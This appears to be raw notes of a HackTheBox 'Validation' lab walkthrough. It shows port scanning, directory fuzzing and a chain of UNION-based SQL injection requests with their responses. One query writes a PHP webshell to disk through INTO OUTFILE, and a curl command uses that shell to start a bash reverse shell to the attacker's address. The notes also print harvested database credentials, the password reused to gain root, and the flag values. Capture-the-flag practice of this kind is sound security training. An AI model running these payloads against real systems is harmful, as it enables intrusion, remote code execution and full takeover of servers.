HTB Validation done
Validation
Notes
OS:
Linux
Technology:
MariaDB 10.5.11
IP Address:
10.129.95.235
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.48 ((Debian))
4566/tcp open http nginx
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
5005/tcp filtered avt-profile-2
5006/tcp filtered wsm-server
5007/tcp filtered wsm-server-ssl
5008/tcp filtered synapsis-edge
8080/tcp open http nginx
Users and pass:
From file: /var/www/html/config.php
U: uhc
P: uhc-9qual-global-pw
---
U: root
P: uhc-9qual-global-pw
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Validation]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.95.235_nmap 10.129.95.235 ; cat 10.129.95.235_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-04 14:08 CEST
Nmap scan report for 10.129.95.235
Host is up (0.039s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
4566/tcp open http nginx
|_http-title: 403 Forbidden
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
5005/tcp filtered avt-profile-2
5006/tcp filtered wsm-server
5007/tcp filtered wsm-server-ssl
5008/tcp filtered synapsis-edge
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Ffuz: http://10.129.95.235/FUZZ
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Validation]
└─$ ffuf -u http://10.129.95.235/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.95.235_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.95.235/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.95.235_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
account.php [Status: 200, Size: 16, Words: 2, Lines: 1, Duration: 35ms]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 38ms]
css [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 40ms]
[INFO] Adding a new job to the queue: http://10.129.95.235/css/FUZZ
index.php [Status: 200, Size: 16088, Words: 4698, Lines: 269, Duration: 83ms]
js [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 40ms]
[INFO] Adding a new job to the queue: http://10.129.95.235/js/FUZZ
[INFO] Starting queued job on target: http://10.129.95.235/css/FUZZ
[INFO] Starting queued job on target: http://10.129.95.235/js/FUZZ
:: Progress: [163752/163752] :: Job [3/3] :: 862 req/sec :: Duration: [0:03:03] :: Errors: 0 ::
SQLI via POST request
POST / HTTP/1.1
Host: 10.129.95.235
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://10.129.95.235
Connection: keep-alive
Referer: http://10.129.95.235/
Cookie: user=5a105e8b9d40e1329780d62ea2265d8a
Upgrade-Insecure-Requests: 1
Priority: u=0, i
username=test1&country=Afganistan'
---
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 10:37:32 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 850
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test1</h1><h3 class="text-white">Other Players In Afganistan'</h3><br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in <b>/var/www/html/account.php</b> on line <b>33</b><br />
Enumerate database
Check DB version
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:01:56 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 734
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select @@version -- '</h3><li class='text-white'>10.5.11-MariaDB-1</li> </div>
</section>
</div>
Check username
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:29:16 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 727
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select user() -- '</h3><li class='text-white'>uhc@localhost</li> </div>
</section>
</div>
Check DB name
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:30:02 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 730
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select database() -- '</h3><li class='text-white'>registration</li> </div>
</section>
</div>
Check schema_name
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:33:20 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 889
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select schema_name from information_schema.schemata -- '</h3><li class='text-white'>information_schema</li><li class='text-white'>performance_schema</li><li class='text-white'>mysql</li><li class='text-white'>registration</li> </div>
</section>
</div>
Check table_name
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:34:37 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 797
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select table_name from information_schema.tables where table_schema = 'registration' -- '</h3><li class='text-white'>registration</li> </div>
</section>
</div>
Check column_name
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:35:43 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 899
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select column_name from information_schema.columns where table_name = 'registration' -- '</h3><li class='text-white'>username</li><li class='text-white'>userhash</li><li class='text-white'>country</li><li class='text-white'>regtime</li> </div>
</section>
</div>
Check priv for user uhc@localhost
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:36:44 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 2244
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'" -- '</h3><li class='text-white'>SELECT</li><li class='text-white'>INSERT</li><li class='text-white'>UPDATE</li><li class='text-white'>DELETE</li><li class='text-white'>CREATE</li><li class='text-white'>DROP</li><li class='text-white'>RELOAD</li><li class='text-white'>SHUTDOWN</li><li class='text-white'>PROCESS</li><li class='text-white'>FILE</li><li class='text-white'>REFERENCES</li><li class='text-white'>INDEX</li><li class='text-white'>ALTER</li><li class='text-white'>SHOW DATABASES</li><li class='text-white'>SUPER</li><li class='text-white'>CREATE TEMPORARY TABLES</li><li class='text-white'>LOCK TABLES</li><li class='text-white'>EXECUTE</li><li class='text-white'>REPLICATION SLAVE</li><li class='text-white'>BINLOG MONITOR</li><li class='text-white'>CREATE VIEW</li><li class='text-white'>SHOW VIEW</li><li class='text-white'>CREATE ROUTINE</li><li class='text-white'>ALTER ROUTINE</li><li class='text-white'>CREATE USER</li><li class='text-white'>EVENT</li><li class='text-white'>TRIGGER</li><li class='text-white'>CREATE TABLESPACE</li><li class='text-white'>DELETE HISTORY</li><li class='text-white'>SET USER</li><li class='text-white'>FEDERATED ADMIN</li><li class='text-white'>CONNECTION ADMIN</li><li class='text-white'>READ_ONLY ADMIN</li><li class='text-white'>REPLICATION SLAVE ADMIN</li><li class='text-white'>REPLICATION MASTER ADMIN</li><li class='text-white'>BINLOG ADMIN</li><li class='text-white'>BINLOG REPLAY</li><li class='text-white'>SLAVE MONITOR</li> </div>
</section>
</div>
Create revshell
Upload webshell
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 12:03:15 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 944
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome df</h1><h3 class="text-white">Other Players In Afganistan' union select "<?php SYSTEM($_REQUEST['cmd']); ?>" into outfile '/var/www/html/revshell.php' -- '</h3><br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in <b>/var/www/html/account.php</b> on line <b>33</b><br />
Start revshell
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Validation]
└─$ netcat -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.57] from (UNKNOWN) [10.129.224.149] 39378
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@validation:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Validation]
└─$ curl 10.129.224.149/revshell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.57/4444 0>&1"'
Spawning TTY shell
script /dev/null -c bash
CTRL+Z
stty raw -echo ; fg
reset
screen
Read flag: user.txt
www-data@validation:/var/www/html$ find / -name "user.txt" 2>/dev/null
/home/htb/user.txt
www-data@validation:/var/www/html$
www-data@validation:/var/www/html$ cat /home/htb/user.txt
569a5a9f811f2db3a11ec9bc56aa11da
www-data@validation:/var/www/html$
Read file: /var/www/html/config.php
Found creds:
U: uhc
P: uhc-9qual-global-pw
---
www-data@validation:/var/www/html$ ls -a
. .. account.php config.php css index.php js
www-data@validation:/var/www/html$ cat config.php
<?php
$servername = "127.0.0.1";
$username = "uhc";
$password = "uhc-9qual-global-pw";
$dbname = "registration";
$conn = new mysqli($servername, $username, $password, $dbname);
?>
Read flag: root.txt
U: root
P: uhc-9qual-global-pw
---
www-data@validation:/var/www/html$ su root
Password:
root@validation:/var/www/html#
root@validation:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@validation:/var/www/html#
root@validation:/var/www/html# cd /root/
root@validation:~#
root@validation:~# ls -a
. .bash_history .lesshst .profile .vim ipp.ko
.. .bashrc .local .selected_editor .viminfo root.txt
.aws .cache .passwd-s3fs .ssh config snap
root@validation:~#
root@validation:~# cat root.txt
f5c67d4157797d8f57836bc151368950
root@validation:~#
References
Lessons Learned